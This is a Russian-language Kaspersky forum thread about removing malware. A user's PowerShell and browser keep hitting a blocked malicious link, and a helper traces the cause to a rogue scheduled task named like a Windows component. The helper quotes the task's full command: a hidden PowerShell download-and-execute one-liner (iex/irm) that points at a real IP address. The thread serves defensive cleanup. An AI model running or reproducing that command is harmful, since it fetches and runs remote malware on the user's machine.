Перейти к содержанию
Правила раздела

[РЕШЕНО] Powershell и Yandex Browser пытаются запустить переход по вредоносной ссылке

Maxim228

Автор Maxim228
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Maxim228

Maxim228

Опубликовано
Опубликовано (изменено)

Проблема в следующем: Powershell иногда запускается и сразу закрывается, после чего антивирус публикует уведомление, что был заблокирован переход по ссылке. 

Много раз запускал проверку на вирусы, никакие угрозы найти не удалось.

Тест сообщения антивируса:

Цитата

Событие: Остановлен переход на сайт
Пользователь: DESKTOP-NDVI5Q2\Максим
Тип пользователя: Инициатор
Имя приложения: powershell.exe
Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
Компонент: Интернет-защита
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название: https://i.404.pm/2024/11/16/1731762779-9803.jpeg
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: 1731762779-9803.jpeg
Путь к объекту: https://i.404.pm/2024/11/16
Причина: Облачная защита

Помогите устранить проблему пожалуйста(когда писал это сообщение появилось еще 2 уведомления о блокировке).

Дополнение: когда я писал это сообщение касперский жаловался на переход по ссылке, но уже через браузер.

Цитата

Событие: Остановлен переход на сайт
Пользователь: DESKTOP-NDVI5Q2\Максим
Тип пользователя: Инициатор
Имя приложения: browser.exe
Путь к приложению: C:\Users\Максим\AppData\Local\Yandex\YandexBrowser\Application
Компонент: Интернет-защита
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название: https://i.404.pm/2024/11/16/1731762779-9803.jpeg
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: 1731762779-9803.jpeg
Путь к объекту: https://i.404.pm/2024/11/16
Причина: Облачная защита

 

отчет.txt

Изменено пользователем Maxim228
  • Maxim228 изменил название на Powershell и Yandex Browser пытаются запустить переход по вредоносной ссылке
Sandor

Sandor

Опубликовано
Опубликовано

"Пофиксите" в HijackThis только следующее: 

O22 - Tasks: SecurityHealthSystray - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm '130.0.235.242/0x55/3')" (sign: 'Microsoft')

 

Перезагрузите компьютер и соберите новый CollectionLog Автологером.

 

Sandor

Sandor

Опубликовано
Опубликовано

Хорошо, последите и через время сообщите.

 

Пока наблюдаете, сделайте такую проверку:

  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.


 
Sandor

Sandor

Опубликовано
Опубликовано

Исправьте по возможности:

 

AMD Software v.24.9.1 Внимание! Скачать обновления
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 v.14.36.32532.0 Внимание! Скачать обновления
Yandex v.24.12.2.856 Внимание! Скачать обновления
^Проверьте обновления через меню Дополнительно - О браузере Yandex!^
 

---------------------------- [ UnwantedApps ] -----------------------------
Кнопки сервисов Яндекса на панели задач v.3.7.9.0 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
Razer Cortex v.10.16.1.0 Внимание! Подозрение на демо-версию антивредоносной программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.
 

  • 2 месяца спустя...
Sandor

Sandor

Опубликовано
Опубликовано

Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в ТурциюАрмениюСочиКамбоджу можете стать и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, клуб "Лаборатории Касперского".

Гость
Эта тема закрыта для публикации ответов.
 Поделиться
Перейти к списку тем

  • Похожий контент

    • QQxR
      [РЕШЕНО] Kaspersky (Защита AMSI) постоянно помечает powershell.exe как троян HEUR:Trojan-Downloader.BAT.Agent.gen
      Автор QQxR
      15.03.2026 при загрузке системы начало появляться окно PowerShell.
      Мои аккаунты Discord, Steam и Telegram были взломаны, но на данный момент я восстановил к ним доступ. Kaspersky удаляет трояны, но уведомления об угрозах продолжают появляться до сих пор.
      (Примечание: русский язык не является моим родным).

      Application name: powershell.exe
      Application path: C:\Windows\System32\WindowsPowerShell\v1.0
      Component: AMSI Protection
      Result description: Detected
      Type: Trojan
      Name: HEUR:Trojan-Downloader.BAT.Agent.gen
      Precision: Heuristic analysis
      Threat level: High
      Object type: File
      Object name: amsi_stream_1991
      Object path: uid://
      MD5 of an object: B3127F27D52B5A4B709C5ABD09B52141
      Reason: Expert analysis

      Я следую инструкциям, но не очень хорошо читаю по-русски. Посмотрите, пожалуйста, скачал ли я правильную программу?
    • Dmitryy120
      Как работает kvrt?
      Автор Dmitryy120
      Допустим я скачал какой то exe файл с какого то подозрительного сайта ( я не запускал его) , и хочу просканировать его на своем ноуте через утилиту KVRT перед запуском , и выбираю эту подозрительную программу, как KVRT ее просканирует , он запустит ее на моем ноутбуке, или как выполняется сканирование ? Просто предположу , допустим это какой то стилер или другое вредоносное ПО, kvrt во время проверки запускает эту программу на моем компьютере , она выполняет свою вредоносную функцию , ворует данные с компьютера или что то еще , kvrt еще обнаруживает и удаляет. По сути программа уже выполнила свод функцию и украла все данные. И может удаляться, это работает по такому сценарию, который я предположил или сканирование проходит по другому ?
    • Андрей Востоков
      [РЕШЕНО] Помогите удалить майнер
      Автор Андрей Востоков
      Добрый Вечер! Не получается удалить майнер, после проверки через Malwarebytes программа удаляет майнер, после чего тот устанавливается снова и так каждые 5-10 минут и после перезапуска системы. Отчет по логам и отчет Malwarebytes прилагается 
      CollectionLog-2026.02.11-16.12.zip Malwarebytes Отчет о проверке 2026-02-11 111923.txt
    • nazarrich
      Угроза DPC:PowerShell.AVKill.10 NET:MINERS.URL
      Автор nazarrich
      Столкнулся с проблемой что словил походу майнер установил dr.web cureit и он нашёл две угрозы DPC:PowerShell.AVKill.10 NET:MINERS.URL и вылечить он не может пытался как то решить не получается
      отчёт.rar
    • Радмир
      Перестал работать интернет
      Автор Радмир
      при вводе запроса в браузере находит сайты скорость интернета показывает нормальная но почти никакие сайты не грузит скорее никакие не знаю что делать я даже не могу скачать антивирус на Пк потому что нет интернета
×
×
  • Создать...